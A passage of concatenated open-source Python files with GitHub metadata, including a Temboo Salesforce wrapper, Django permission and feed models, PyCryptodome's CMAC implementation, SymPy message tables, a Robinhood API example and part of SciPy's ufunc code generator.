set of Temboo credentials, must be supplied.
"""
super(ListObjectTypes, self).__init__(temboo_session, '/Library/Salesforce/Objects/ListObjectTypes')
def new_input_set(self):
return ListObjectTypesInputSet()
def _make_result_set(self, result, path):
return ListObjectTypesResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return ListObjectTypesChoreographyExecution(session, exec_id, path)
class ListObjectTypesInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the ListObjectTypes
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_AccessToken(self, value):
"""
Set the value of the AccessToken input for this Choreo. ((optional, string) A valid access token retrieved during the OAuth process. This is required unless you provide the ClientID, ClientSecret, and RefreshToken to generate a new access token.)
"""
super(ListObjectTypesInputSet, self)._set_input('AccessToken', value)
def set_ClientID(self, value):
"""
Set the value of the ClientID input for this Choreo. ((conditional, string) The Client ID provided by Salesforce. Required unless providing a valid AccessToken.)
"""
super(ListObjectTypesInputSet, self)._set_input('ClientID', value)
def set_ClientSecret(self, value):
"""
Set the value of the ClientSecret input for this Choreo. ((conditional, string) The Client Secret provided by Salesforce. Required unless providing a valid AccessToken.)
"""
super(ListObjectTypesInputSet, self)._set_input('ClientSecret', value)
def set_InstanceName(self, value):
"""
Set the value of the InstanceName input for this Choreo. ((required, string) The server url prefix that indicates which instance your Salesforce account is on (e.g. na1, na2, na3, etc).)
"""
super(ListObjectTypesInputSet, self)._set_input('InstanceName', value)
def set_RefreshToken(self, value):
"""
Set the value of the RefreshToken input for this Choreo. ((conditional, string) An OAuth refresh token used to generate a new access token when the original token is expired. Required unless providing a valid AccessToken.)
"""
super(ListObjectTypesInputSet, self)._set_input('RefreshToken', value)
def set_ResponseFormat(self, value):
"""
Set the value of the ResponseFormat input for this Choreo. ((optional, string) The format that the response should be in. Valid values are: json (the default) and xml.)
"""
super(ListObjectTypesInputSet, self)._set_input('ResponseFormat', value)
class ListObjectTypesResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the ListObjectTypes Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. (The response from Salesforce.)
"""
return self._output.get('Response', None)
def get_NewAccessToken(self):
"""
Retrieve the value for the "NewAccessToken" output from this Choreo execution. ((string) Contains a new AccessToken when the RefreshToken is provided.)
"""
return self._output.get('NewAccessToken', None)
class ListObjectTypesChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return ListObjectTypesResultSet(response, path)
| {
"content_hash": "8663e9bd2a5d0b97c74da98646b661a2",
"timestamp": "",
"source": "github",
"line_count": 86,
"max_line_length": 254,
"avg_line_length": 48.25581395348837,
"alnum_prop": 0.7057831325301205,
"repo_name": "jordanemedlock/psychtruths",
"id": "b7d0ab8bec14b492c0f998a23364b4b471fdd945",
"size": "5047",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "temboo/core/Library/Salesforce/Objects/ListObjectTypes.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "18544"
},
{
"name": "HTML",
"bytes": "34650"
},
{
"name": "JavaScript",
"bytes": "423"
},
{
"name": "PHP",
"bytes": "1097"
},
{
"name": "Python",
"bytes": "23444578"
}
],
"symlink_target": ""
} |
from django.contrib.auth.backends import ModelBackend
from django.contrib.auth.models import Group
from models import UserPermissionList, GroupPermissionList
class NonrelPermissionBackend(ModelBackend):
"""
Implements Django's permission system on Django-Nonrel
"""
supports_object_permissions = False
supports_anonymous_user = True
def get_group_permissions(self, user_obj, obj=None, user_perm_list=None):
"""
Returns a set of permission strings that this user has through his/her
groups.
"""
if user_obj.is_anonymous() or obj is not None:
return set()
if not hasattr(user_obj, '_group_perm_cache'):
perms = set([])
if not user_perm_list:
user_perm_list, _ = UserPermissionList.objects.get_or_create(user=user_obj)
groups = Group.objects.filter(id__in=user_perm_list.group_fk_list)
group_perm_lists = GroupPermissionList.objects.filter(group__in=list(groups))
for group_perm_list in group_perm_lists:
perms.update(group_perm_list.permission_list)
user_obj._group_perm_cache = perms
return user_obj._group_perm_cache
def get_all_permissions(self, user_obj, obj=None):
if user_obj.is_anonymous() or obj is not None:
return set()
if not hasattr(user_obj, '_perm_cache'):
try:
user_perm_list = UserPermissionList.objects.get(user=user_obj)
user_obj._perm_cache = set(user_perm_list.permission_list)
except UserPermissionList.DoesNotExist:
user_perm_list = None
user_obj._perm_cache = set()
user_obj._perm_cache.update(self.get_group_permissions(user_obj, user_perm_list=user_perm_list))
return user_obj._perm_cache
| {
"content_hash": "78c7e3bdd2ed6cf8d203341c5eeb0682",
"timestamp": "",
"source": "github",
"line_count": 47,
"max_line_length": 108,
"avg_line_length": 39.51063829787234,
"alnum_prop": 0.6322024771136241,
"repo_name": "vongochung/buiquocviet",
"id": "1cac6c5e71c6262f7cbd61ad945757903ae32fd4",
"size": "1857",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "permission_backend_nonrel/backends.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "114911"
},
{
"name": "JavaScript",
"bytes": "400340"
},
{
"name": "Python",
"bytes": "4966537"
},
{
"name": "Shell",
"bytes": "868"
}
],
"symlink_target": ""
} |
import datetime
from django.db import models
from django.utils.translation import ugettext_lazy as _
from django.conf import settings
from django.template.defaultfilters import slugify
APPROVED_FEED='A'
DENIED_FEED='D'
PENDING_FEED='P'
DELETED_FEED='F'
STATUS_CHOICES = (
(PENDING_FEED, 'Pending'),
(DENIED_FEED, 'Denied'),
(APPROVED_FEED, 'Approved'),
)
class Feed(models.Model):
title = models.CharField(max_length=500)
slug = models.SlugField(max_length=500)
public_url = models.URLField(max_length=500)
feed_url = models.URLField(unique=True, max_length=500)
is_defunct = models.BooleanField(default=False)
approval_status = models.CharField(max_length=1, choices=STATUS_CHOICES, default=PENDING_FEED)
owner = models.ForeignKey(settings.AUTH_USER_MODEL, blank=True, null=True, related_name='owned_feeds')
date_added = models.DateTimeField(verbose_name=_("When Feed was added to the site"), auto_now_add=True)
def __unicode__(self):
return self.title
def save(self, **kwargs):
if not self.id:
self.slug = slugify(self.title)
super(Feed, self).save(**kwargs)
class Meta:
ordering = ("title",)
| {
"content_hash": "2cf64dbc6d87bd3f725728db6ba0f602",
"timestamp": "",
"source": "github",
"line_count": 38,
"max_line_length": 104,
"avg_line_length": 29.657894736842106,
"alnum_prop": 0.7391304347826086,
"repo_name": "underlost/GamerNews",
"id": "ab9a8821fc14acd1bd4074366255f6e9e78a4ddc",
"size": "1127",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "gamernews/apps/populate/models.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "226951"
},
{
"name": "JavaScript",
"bytes": "135586"
},
{
"name": "Python",
"bytes": "124181"
}
],
"symlink_target": ""
} |
"""CMAC (Cipher-based Message Authentication Code) algorithm
CMAC is a MAC defined in `NIST SP 800-38B`_ and in RFC4493_ (for AES only)
and constructed using a block cipher. It was originally known as `OMAC1`_.
The algorithm is sometimes named *X-CMAC* where *X* is the name
of the cipher (e.g. AES-CMAC).
This is an example showing how to *create* an AES-CMAC:
>>> from Crypto.Hash import CMAC
>>> from Crypto.Cipher import AES
>>>
>>> secret = b'Sixteen byte key'
>>> cobj = CMAC.new(secret, ciphermod=AES)
>>> cobj.update(b'Hello')
>>> print cobj.hexdigest()
And this is an example showing how to *check* an AES-CMAC:
>>> from Crypto.Hash import CMAC
>>> from Crypto.Cipher import AES
>>>
>>> # We have received a message 'msg' together
>>> # with its MAC 'mac'
>>>
>>> secret = b'Sixteen byte key'
>>> cobj = CMAC.new(secret, ciphermod=AES)
>>> cobj.update(msg)
>>> try:
>>> cobj.verify(mac)
>>> print "The message '%s' is authentic" % msg
>>> except ValueError:
>>> print "The message or the key is wrong"
A cipher block size of 128 bits (like for AES) guarantees that the risk
of MAC collisions remains negligeable even when the same CMAC key is
used to authenticate a large amount of data (2^22 Gbytes).
This implementation allows also usage of ciphers with a 64 bits block size
(like TDES) for legacy purposes only.
However, the risk is much higher and one CMAC key should be rotated
after as little as 16 MBytes (in total) have been authenticated.
.. _`NIST SP 800-38B`: http://csrc.nist.gov/publications/nistpubs/800-38B/SP_800-38B.pdf
.. _RFC4493: http://www.ietf.org/rfc/rfc4493.txt
.. _OMAC1: http://www.nuee.nagoya-u.ac.jp/labs/tiwata/omac/omac.html
"""
from Crypto.Util.py3compat import b, bchr, bord, tobytes
from binascii import unhexlify
from Crypto.Hash import BLAKE2s
from Crypto.Util.strxor import strxor
from Crypto.Util.number import long_to_bytes, bytes_to_long
from Crypto.Random import get_random_bytes
#: The size of the authentication tag produced by the MAC.
digest_size = None
def _shift_bytes(bs, xor_lsb=0):
num = (bytes_to_long(bs) << 1) ^ xor_lsb
return long_to_bytes(num, len(bs))[-len(bs):]
class CMAC(object):
"""Class that implements CMAC"""
#: The size of the authentication tag produced by the MAC.
digest_size = None
def __init__(self, key, msg=None, ciphermod=None, cipher_params=None):
"""Create a new CMAC object.
:Parameters:
key : byte string
secret key for the CMAC object.
The key must be valid for the underlying cipher algorithm.
For instance, it must be 16 bytes long for AES-128.
msg : byte string
The very first chunk of the message to authenticate.
It is equivalent to an early call to `update`. Optional.
ciphermod : module
A cipher module from `Crypto.Cipher`.
The cipher's block size has to be 128 bits.
It is recommended to use `Crypto.Cipher.AES`.
cipher_params : dictionary
Extra keywords to use when creating a new cipher.
"""
if ciphermod is None:
raise TypeError("ciphermod must be specified (try AES)")
self._key = key
self._factory = ciphermod
if cipher_params is None:
self._cipher_params = {}
else:
self._cipher_params = dict(cipher_params)
# Section 5.3 of NIST SP 800 38B and Appendix B
if ciphermod.block_size == 8:
const_Rb = 0x1B
self._max_size = 8 * (2 ** 21)
elif ciphermod.block_size == 16:
const_Rb = 0x87
self._max_size = 16 * (2 ** 48)
else:
raise TypeError("CMAC requires a cipher with a block size"
"of 8 or 16 bytes, not %d" %
(ciphermod.block_size,))
# Size of the final MAC tag, in bytes
self.digest_size = ciphermod.block_size
self._mac_tag = None
# Compute sub-keys
zero_block = bchr(0) * ciphermod.block_size
cipher = ciphermod.new(key,
ciphermod.MODE_ECB,
**self._cipher_params)
l = cipher.encrypt(zero_block)
if bord(l[0]) & 0x80:
self._k1 = _shift_bytes(l, const_Rb)
else:
self._k1 = _shift_bytes(l)
if bord(self._k1[0]) & 0x80:
self._k2 = _shift_bytes(self._k1, const_Rb)
else:
self._k2 = _shift_bytes(self._k1)
# Initialize CBC cipher with zero IV
self._cbc = ciphermod.new(key,
ciphermod.MODE_CBC,
zero_block,
**self._cipher_params)
# Cache for outstanding data to authenticate
self._cache = b("")
# Last two pieces of ciphertext produced
self._last_ct = self._last_pt = zero_block
self._before_last_ct = None
# Counter for total message size
self._data_size = 0
if msg:
self.update(msg)
def update(self, msg):
"""Continue authentication of a message by consuming
the next chunk of data.
Repeated calls are equivalent to a single call with
the concatenation of all the arguments. In other words:
>>> m.update(a); m.update(b)
is equivalent to:
>>> m.update(a+b)
:Parameters:
msg : byte string
The next chunk of the message being authenticated
"""
self._data_size += len(msg)
if len(self._cache) > 0:
filler = min(self.digest_size - len(self._cache), len(msg))
self._cache += msg[:filler]
if len(self._cache) < self.digest_size:
return self
msg = msg[filler:]
self._update(self._cache)
self._cache = b("")
update_len, remain = divmod(len(msg), self.digest_size)
update_len *= self.digest_size
if remain > 0:
self._update(msg[:update_len])
self._cache = msg[update_len:]
else:
self._update(msg)
self._cache = b("")
return self
def _update(self, data_block):
"""Update a block aligned to the block boundary"""
if len(data_block) == 0:
return
assert len(data_block) % self.digest_size == 0
ct = self._cbc.encrypt(data_block)
if len(data_block) == self.digest_size:
self._before_last_ct = self._last_ct
else:
self._before_last_ct = ct[-self.digest_size * 2:-self.digest_size]
self._last_ct = ct[-self.digest_size:]
self._last_pt = data_block[-self.digest_size:]
def copy(self):
"""Return a copy ("clone") of the MAC object.
The copy will have the same internal state as the original MAC
object.
This can be used to efficiently compute the MAC of strings that
share a common initial substring.
:Returns: A `CMAC` object
"""
obj = CMAC(self._key,
ciphermod=self._factory,
cipher_params=self._cipher_params)
obj._cbc = self._factory.new(self._key,
self._factory.MODE_CBC,
self._last_ct,
**self._cipher_params)
for m in ['_mac_tag', '_last_ct', '_before_last_ct', '_cache',
'_data_size', '_max_size']:
setattr(obj, m, getattr(self, m))
return obj
def digest(self):
"""Return the **binary** (non-printable) MAC of the message that has
been authenticated so far.
This method does not change the state of the MAC object.
You can continue updating the object after calling this function.
:Return: A byte string of `digest_size` bytes. It may contain non-ASCII
characters, including null bytes.
"""
if self._mac_tag is not None:
return self._mac_tag
if self._data_size > self._max_size:
raise ValueError("MAC is unsafe for this message")
if len(self._cache) == 0 and self._before_last_ct is not None:
## Last block was full
pt = strxor(strxor(self._before_last_ct, self._k1), self._last_pt)
else:
## Last block is partial (or message length is zero)
ext = self._cache + bchr(0x80) +\
bchr(0) * (self.digest_size - len(self._cache) - 1)
pt = strxor(strxor(self._last_ct, self._k2), ext)
cipher = self._factory.new(self._key,
self._factory.MODE_ECB,
**self._cipher_params)
self._mac_tag = cipher.encrypt(pt)
return self._mac_tag
def hexdigest(self):
"""Return the **printable** MAC of the message that has been
authenticated so far.
This method does not change the state of the MAC object.
:Return: A string of 2* `digest_size` bytes. It contains only
hexadecimal ASCII digits.
"""
return "".join(["%02x" % bord(x)
for x in tuple(self.digest())])
def verify(self, mac_tag):
"""Verify that a given **binary** MAC (computed by another party)
is valid.
:Parameters:
mac_tag : byte string
The expected MAC of the message.
:Raises ValueError:
if the MAC does not match. It means that the message
has been tampered with or that the MAC key is incorrect.
"""
secret = get_random_bytes(16)
mac1 = BLAKE2s.new(digest_bits=160, key=secret, data=mac_tag)
mac2 = BLAKE2s.new(digest_bits=160, key=secret, data=self.digest())
if mac1.digest() != mac2.digest():
raise ValueError("MAC check failed")
def hexverify(self, hex_mac_tag):
"""Verify that a given **printable** MAC (computed by another party)
is valid.
:Parameters:
hex_mac_tag : string
The expected MAC of the message, as a hexadecimal string.
:Raises ValueError:
if the MAC does not match. It means that the message
has been tampered with or that the MAC key is incorrect.
"""
self.verify(unhexlify(tobytes(hex_mac_tag)))
def new(key, msg=None, ciphermod=None, cipher_params=None):
"""Create a new CMAC object.
:Parameters:
key : byte string
secret key for the CMAC object.
The key must be valid for the underlying cipher algorithm.
For instance, it must be 16 bytes long for AES-128.
msg : byte string
The very first chunk of the message to authenticate.
It is equivalent to an early call to `CMAC.update`. Optional.
ciphermod : module
A cipher module from `Crypto.Cipher`.
The cipher's block size has to be 128 bits,
like `Crypto.Cipher.AES`, to reduce the probability of collisions.
:Returns: A `CMAC` object
"""
return CMAC(key, msg, ciphermod, cipher_params)
| {
"content_hash": "d8076f71a78f9a04dd08d6fa088254e8",
"timestamp": "",
"source": "github",
"line_count": 330,
"max_line_length": 88,
"avg_line_length": 34.47575757575758,
"alnum_prop": 0.5728223609035774,
"repo_name": "Samuel789/MediPi",
"id": "6c10390d35604d874ee9e1855aca3e554410f005",
"size": "12413",
"binary": false,
"copies": "9",
"ref": "refs/heads/master",
"path": "MedManagementWeb/env/lib/python3.5/site-packages/Crypto/Hash/CMAC.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "10012"
},
{
"name": "CSS",
"bytes": "847678"
},
{
"name": "HTML",
"bytes": "4238145"
},
{
"name": "Java",
"bytes": "1942198"
},
{
"name": "JavaScript",
"bytes": "2308166"
},
{
"name": "PHP",
"bytes": "1684"
},
{
"name": "Python",
"bytes": "66091"
},
{
"name": "Ruby",
"bytes": "1183"
},
{
"name": "Shell",
"bytes": "17053"
}
],
"symlink_target": ""
} |
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from django.utils.translation import gettext_lazy as _
from djangocms_blog.admin import PostAdmin
from .models import CustomUser, PostExtension
@admin.register(CustomUser)
class CustomUserAdmin(UserAdmin):
model = CustomUser
fieldsets = (
(None, {"fields": ("username", "password")}),
(_("Personal info"), {"fields": ("first_name", "last_name", "email")}),
(_("Permissions"), {"fields": ("is_active", "is_staff", "is_superuser", "groups", "user_permissions")}),
(_("Important dates"), {"fields": ("last_login", "date_joined")}),
(_("Sites"), {"fields": ("sites",)}),
)
class CustomPostAdmin(PostAdmin):
_fieldsets = [
(None, {"fields": ["title", "subtitle", "slug", "publish", "categories"]}),
(
_("Info"),
{
"fields": [
["tags"],
["date_published", "date_published_end", "date_featured"],
"app_config",
"enable_comments",
],
"classes": ("collapse",),
},
),
(
_("Images"),
{"fields": [["main_image", "main_image_thumbnail", "main_image_full"]], "classes": ("collapse",)},
),
(_("SEO"), {"fields": [["meta_description", "meta_title", "meta_keywords"]], "classes": ("collapse",)}),
]
_fieldset_extra_fields_position = {
"abstract": [0, 1],
"post_text": [0, 1],
"sites": [1, 1, 0],
"author": [1, 1],
"enable_liveblog": None,
"related": None,
}
class PostExtensionInline(admin.TabularInline):
model = PostExtension
fields = ["some_field"]
classes = ["collapse"]
extra = 1
can_delete = False
verbose_name = "PostExtension"
verbose_name_plural = "PostExtensions"
| {
"content_hash": "ce21299d08fd4267e0074cafb47ae801",
"timestamp": "",
"source": "github",
"line_count": 61,
"max_line_length": 112,
"avg_line_length": 31.59016393442623,
"alnum_prop": 0.5241307732226258,
"repo_name": "nephila/djangocms-blog",
"id": "ff284d561dcaa88520b7cef79eb46dbcc71319cb",
"size": "1927",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "tests/test_utils/admin.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "939"
},
{
"name": "HTML",
"bytes": "16041"
},
{
"name": "JavaScript",
"bytes": "1094"
},
{
"name": "Python",
"bytes": "389126"
}
],
"symlink_target": ""
} |
from sympy import srepr
#Singleton related return values
class SingletonOutput():
messages = {
'IMPROPER_TERM': 'Improper term in singleton',
'REDUCIBLE': "Singleton can be reduced",
'INVALID_SUM': "More than one term in singleton",
'INVALID_PRODUCT': "Invalid product in singleton",
'VALID_SUM':"Expression is a valid singleton",
'VALID_PRODUCT':"Expression is a valid singleton",
'VALID': "Expression is a singleton",
'VALID_TRIG': "Expression is a trig function",
'VALID_INVTRIG': "Expression is an inverse trig function",
'INVALID': "Not a singleton",
'COMPLEX': "Expression is a complex number",
'COMPLEX_NO_REAL': "Complex number that has no real part",
'REAL': "Expression is a real singleton",
'IMAGINARY': "Expression is the imaginary unit",
'IMAGINARY_IMPROPER':"Imaginary Number to improper power",
'IMAGINARY_OK_FACTORS':"Expression has no imaginary numbers to powers"
}
@staticmethod
def strout(key):
return SingletonOutput.messages.get(key, None)
@staticmethod
def exprstrout(key, expr):
return srepr(expr)+" "+SingletonOutput.messages.get(key, None)
class MonomialOutput():
#Monomial related return values
messages = {
'REDUCIBLE':"Monomial is reducible",
'EXPANDABLE':"One or more monomials could be expanded",
'PROPER':"Expression is a proper monomial",
'IMPROPER':"Expression is not a proper monomial",
'IS_SINGLETON':"Monomial is also a singleton",
'MULTIPLE_TERMS':"More than 1 term in monomial"
}
@staticmethod
def strout(key):
return MonomialOutput.messages.get(key, None)
@staticmethod
def exprstrout(key, expr):
return srepr(expr)+" "+MonomialOutput.messages.get(key, None)
class PolynomialOutput():
#Polynomial related return values
messages = {
'IS_MONOMIAL':"Expression is also a monomial",
'EXPANDED':"Monomials in expression are expanded",
'FACTORED':"Expression is fully factored!",
'NOT_FACTORED':"Expression is not fully factored",
'NOT_MONOMIAL':"One or more terms is not a proper monomial",
'NOT_EXPANDED':"Expression is not fully expanded",
'SQUAREFREE':"Expression is squarefree",
'NOT_SQUAREFREE':"Expression is not squarefree",
'CONTENTFREE_MONOMIAL':"Expression is a monomial",
'CONTENTFREE':"Expression is contentfree",
'NOT_CONTENTFREE':"Expression is not contentfree",
'COMPlEX_HIGH_DEGREE':"Expression has a degree higher than 1",
'COMPLEX_FACTORED':"Expression is simplified over the complex field",
'REAL_HIGH_DEGREE':"Expression has a degree higher than 2",
'REAL_FACTORABLE_QUAD':"Quadratic can be factored further",
'REAL_FACTORED': "Expression is factored within the real numbers",
'INTEGER_REDUCIBLE':"Expression could be factored further in the integers",
'INTEGER_FACTORED':"Expression is factored within the integers",
'RATIONAL_REDUCIBLE':"Expression could be factored further in the rationals",
'RATIONAL_FACTORED':"Expression is factored in the rationals"
''
}
@staticmethod
def strout(key):
return PolynomialOutput.messages.get(key, None)
@staticmethod
def exprstrout(key, expr):
return srepr(expr)+" "+PolynomialOutput.messages.get(key, None)
class UtilOutput():
#Utility related return values
messages = {
'SIMPLIFIABLE_NUMERATOR':"Numerator can be simplified",
'SIMPLIFIABLE_DENOMINATOR':"Denominator can be simplified",
'SIMPLIFIABLE_FRACTION':"Terms in fraction can be cancelled",
'NOT_SIMPLIFIABLE_FRACTION':"No terms can be cancelled in fraction",
'CONST_TO_CONST':"Expression is a constant raised to a constant",
'NOT_CONST_TO_CONST':"Expression isn't a constant raised to a constant",
'ONE_OVER_N':"Expression is raised to 1/n",
'ONE_TO_N':"Expression is 1 raised to a power",
'REDUCIBLE':"Expression is numerically reducible",
'INVERSE_N':"Expression is raised to -1",
'CONST_DIVISIBLE':"One or more terms can be combined",
'NOT_CONST_DIVISIBLE':"Terms cannot be combined by constants",
'TRIG_CAN_SIMPLIFY':"Can be simplified by a trig identity",
'TRIG_CANT_SIMPLIFY':"Can't be simplified by trig identities"
}
@staticmethod
def strout(key):
return UtilOutput.messages.get(key, None)
@staticmethod
def exprstrout(key, expr):
return srepr(expr)+" "+UtilOutput.messages.get(key, None)
class NumBaseOutput():
messages = {
'SMALLER_BASE_EXISTS':"Base could be made smaller",
'SMALLEST_BASE':"Smallest bases possible",
'SIMPLE_BASES':"No bases can be combined",
'NOT_SIMPLE_BASES':"Bases can be combined",
'EXP_0': "Redundant exponent of 0 detected",
'EXP_1': "Redundant exponent of 1 detected",
'EXP_OK': "Exponents in expression are OK",
'MULTIPLE_TERMS':"Multiple terms detected",
'NOT_POW':"Not an expression raised to a power",
'SINGLETON':"Expression is also a singleton"
}
@staticmethod
def strout(key):
return NumBaseOutput.messages.get(key, None)
@staticmethod
def exprstrout(key, expr):
return srepr(expr)+" "+NumBaseOutput.messages.get(key, None)
class ErrorOutput:
#Error related return values
messages = {
'ERROR': "If you see this, we goofed. Email us!"
}
@staticmethod
def strout(key):
return ErrorOutput.messages.get(key, None)
@staticmethod
def exprstrout(key, expr):
return srepr(expr)+" "+ErrorOutput.messages.get(key, None)
| {
"content_hash": "31a4a706d652ad97434b60acf0a0ce4c",
"timestamp": "",
"source": "github",
"line_count": 146,
"max_line_length": 85,
"avg_line_length": 39.89041095890411,
"alnum_prop": 0.6559065934065934,
"repo_name": "lemmalearning/sympy-form-analysis",
"id": "f7e811eb029af43e29ff5dff39a04cdfaac90e81",
"size": "5824",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "form_output.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "65169"
}
],
"symlink_target": ""
} |
from Robinhood import Robinhood
my_trader = Robinhood(username="USERNAME HERE", password="PASSWORD HERE")
#get stock information about a stock
# Note: for some stock names, more than one instrument
# may be returned for a given stock symbol
stock_instrument = my_trader.instruments("GEVO")[0]
#You can stock information about current bid_price, etc
quote_info = my_trader.quote_data("GEVO")
#place a buy order (uses market bid price)
buy_order = my_trader.place_buy_order(stock_instrument, 1)
#place a sell order
sell_order = my_trader.place_sell_order(stock_instrument, 1)
| {
"content_hash": "3227fe182c577a999f4a0387c4804aa8",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 73,
"avg_line_length": 32.55555555555556,
"alnum_prop": 0.7559726962457338,
"repo_name": "imbellish/Robinhood",
"id": "0f0eede8d2bdf3895d458c8edd0bcab1c5d19169",
"size": "586",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "example.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "4494"
}
],
"symlink_target": ""
} |
"""
python _generate_pyx.py
Generate Ufunc definition source files for scipy.special. Produces
files '_ufuncs.c' and '_ufuncs_cxx.c' by first producing Cython.
This will generate both calls to PyUFunc_FromFuncAndData and the
required ufunc inner loops.
The functions signatures are contained in 'functions.json', the syntax
for a function signature is
<function>: <name> ':' <input> '*' <output>
'->' <retval> '*' <ignored_retval>
<input>: <typecode>*
<output>: <typecode>*
<retval>: <typecode>?
<ignored_retval>: <typecode>?
<headers>: <header_name> [',' <header_name>]*
The input parameter types are denoted by single character type
codes, according to
'f': 'float'
'd': 'double'
'g': 'long double'
'F': 'float complex'
'D': 'double complex'
'G': 'long double complex'
'i': 'int'
'l': 'long'
'v': 'void'
If multiple kernel functions are given for a single ufunc, the one
which is used is determined by the standard ufunc mechanism. Kernel
functions that are listed first are also matched first against the
ufunc input types, so functions listed earlier take precedence.
In addition, versions with casted variables, such as d->f,D->F and
i->d are automatically generated.
There should be either a single header that contains all of the kernel
functions listed, or there should be one header for each kernel
function. Cython pxd files are allowed in addition to .h files.
Cython functions may use fused types, but the names in the list
should be the specialized ones, such as 'somefunc[float]'.
Function coming from C++ should have ``++`` appended to the name of
the header.
Floating-point exceptions inside these Ufuncs are converted to
special function errors --- which are separately controlled by the
user, and off by default, as they are usually not especially useful
for the user.
The C++ module
--------------
In addition to ``_ufuncs`` module, a second module ``_ufuncs_cxx`` is
generated. This module only exports function pointers that are to be
used when constructing some of the ufuncs in ``_ufuncs``. The function
pointers are exported via Cython's standard mechanism.
This mainly avoids build issues --- Python distutils has no way to
figure out what to do if you want to link both C++ and Fortran code in
the same shared library.
"""
# -----------------------------------------------------------------------------
# Extra code
# -----------------------------------------------------------------------------
UFUNCS_EXTRA_CODE_COMMON = """\
# This file is automatically generated by _generate_pyx.py.
# Do not edit manually!
from libc.math cimport NAN
include "_ufuncs_extra_code_common.pxi"
"""
UFUNCS_EXTRA_CODE = """\
include "_ufuncs_extra_code.pxi"
"""
UFUNCS_EXTRA_CODE_BOTTOM = """\
#
# Aliases
#
jn = jv
"""
CYTHON_SPECIAL_PXD = """\
# This file is automatically generated by _generate_pyx.py.
# Do not edit manually!
ctypedef fused number_t:
double complex
double
cpdef number_t spherical_jn(long n, number_t z, bint derivative=*) nogil
cpdef number_t spherical_yn(long n, number_t z, bint derivative=*) nogil
cpdef number_t spherical_in(long n, number_t z, bint derivative=*) nogil
cpdef number_t spherical_kn(long n, number_t z, bint derivative=*) nogil
"""
CYTHON_SPECIAL_PYX = """\
# This file is automatically generated by _generate_pyx.py.
# Do not edit manually!
\"\"\"
.. highlight:: cython
Cython API for special functions
================================
Scalar, typed versions of many of the functions in ``scipy.special``
can be accessed directly from Cython; the complete list is given
below. Functions are overloaded using Cython fused types so their
names match their Python counterpart. The module follows the following
conventions:
- If a function's Python counterpart returns multiple values, then the
function returns its outputs via pointers in the final arguments.
- If a function's Python counterpart returns a single value, then the
function's output is returned directly.
The module is usable from Cython via::
cimport scipy.special.cython_special
Error handling
--------------
Functions can indicate an error by returning ``nan``; however they
cannot emit warnings like their counterparts in ``scipy.special``.
Available functions
-------------------
FUNCLIST
Custom functions
----------------
Some functions in ``scipy.special`` which are not ufuncs have custom
Cython wrappers.
Spherical Bessel functions
~~~~~~~~~~~~~~~~~~~~~~~~~~
The optional ``derivative`` boolean argument is replaced with an
optional Cython ``bint``, leading to the following signatures.
- :py:func:`~scipy.special.spherical_jn`::
double complex spherical_jn(long, double complex)
double complex spherical_jn(long, double complex, bint)
double spherical_jn(long, double)
double spherical_jn(long, double, bint)
- :py:func:`~scipy.special.spherical_yn`::
double complex spherical_yn(long, double complex)
double complex spherical_yn(long, double complex, bint)
double spherical_yn(long, double)
double spherical_yn(long, double, bint)
- :py:func:`~scipy.special.spherical_in`::
double complex spherical_in(long, double complex)
double complex spherical_in(long, double complex, bint)
double spherical_in(long, double)
double spherical_in(long, double, bint)
- :py:func:`~scipy.special.spherical_kn`::
double complex spherical_kn(long, double complex)
double complex spherical_kn(long, double complex, bint)
double spherical_kn(long, double)
double spherical_kn(long, double, bint)
\"\"\"
from libc.math cimport NAN
include "_cython_special.pxi"
include "_cython_special_custom.pxi"
"""
STUBS = """\
# This file is automatically generated by _generate_pyx.py.
# Do not edit manually!
from typing import Any, Dict
import numpy as np
__all__ = [
'geterr',
'seterr',
'errstate',
{ALL}
]
def geterr() -> Dict[str, str]: ...
def seterr(**kwargs: str) -> Dict[str, str]: ...
class errstate:
def __init__(self, **kargs: str) -> None: ...
def __enter__(self) -> None: ...
def __exit__(
self,
exc_type: Any, # Unused
exc_value: Any, # Unused
traceback: Any, # Unused
) -> None: ...
{STUBS}
"""
# -----------------------------------------------------------------------------
# Code generation
# -----------------------------------------------------------------------------
import itertools
import json
import os
from stat import ST_MTIME
import argparse
import re
import textwrap
from typing import List
import numpy
BASE_DIR = os.path.abspath(os.path.dirname(__file__))
add_newdocs = __import__('_add_newdocs')
CY_TYPES = {
'f': 'float',
'd': 'double',
'g': 'long double',
'F': 'float complex',
'D': 'double complex',
'G': 'long double complex',
'i': 'int',
'l': 'long',
'v': 'void',
}
C_TYPES = {
'f': 'npy_float',
'd': 'npy_double',
'g': 'npy_longdouble',
'F': 'npy_cfloat',
'D': 'npy_cdouble',
'G': 'npy_clongdouble',
'i': 'npy_int',
'l': 'npy_long',
'v': 'void',
}
TYPE_NAMES = {
'f': 'NPY_FLOAT',
'd': 'NPY_DOUBLE',
'g': 'NPY_LONGDOUBLE',
'F': 'NPY_CFLOAT',
'D': 'NPY_CDOUBLE',
'G': 'NPY_CLONGDOUBLE',
'i': 'NPY_INT',
